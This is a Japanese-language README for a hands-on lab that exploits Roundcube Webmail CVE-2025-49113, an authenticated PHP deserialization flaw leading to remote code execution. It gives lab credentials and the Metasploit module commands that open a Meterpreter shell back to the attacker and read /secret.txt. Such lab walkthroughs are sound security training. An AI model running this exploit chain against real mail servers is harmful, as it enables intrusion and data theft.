Roundcube Webmail CVE-2025-49113(認証済みPHPオブジェクトのデシリアライゼーション→RCE)を悪用して /secret.txt を読み取るためのハンズオン攻撃演習ラボ
"免責事項: 教育目的のみ"
このリポジトリは、管理されたラボ環境で Roundcube Webmail CVE-2025-49113 を段階的に悪用し、/secret.txt に保存された秘密情報を取得するまでの手順をまとめたものです。
⚠️ 免責事項
すべての作業は、テスト実施の許可を得たラボ / トレーニング環境に対して行われました。
自分が所有または管理していないシステムに対しては、これらの手法を使用しないでください。
Roundcube Webmail は、ブラウザベースのオープンソース PHP メールクライアントで、IMAP 経由でメールボックスに接続し、SMTP 経由でメールを送信します。通常は Apache または Nginx 上で MySQL/PostgreSQL/SQLite とともに動作し、共有ホスティング環境で広く使用されています。
脆弱性 – CVE-2025-49113
1.6.10 を含むすべての Roundcube バージョン(および 1.5.10 より前の 1.5.x)には、program/actions/settings/upload.php に重大なバグが存在します。_from パラメータが適切に検証されないため、認証された攻撃者が安全でない PHP オブジェクトのデシリアライゼーションを引き起こし、Web サーバーの権限でリモートコード実行を達成できます。
ラボの認証情報:
roundcubercpass目標:
/secret.txtファイルの中の秘密は何ですか?
nmapmsfconsole (Metasploit 6)172.20.2.57 上の Roundcube Webmailexploit/multi/http/roundcube_auth_rce_cve_2025_49113コマンド: nmap -sV Target Machine
msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine
meterpreter > cat /secret.txt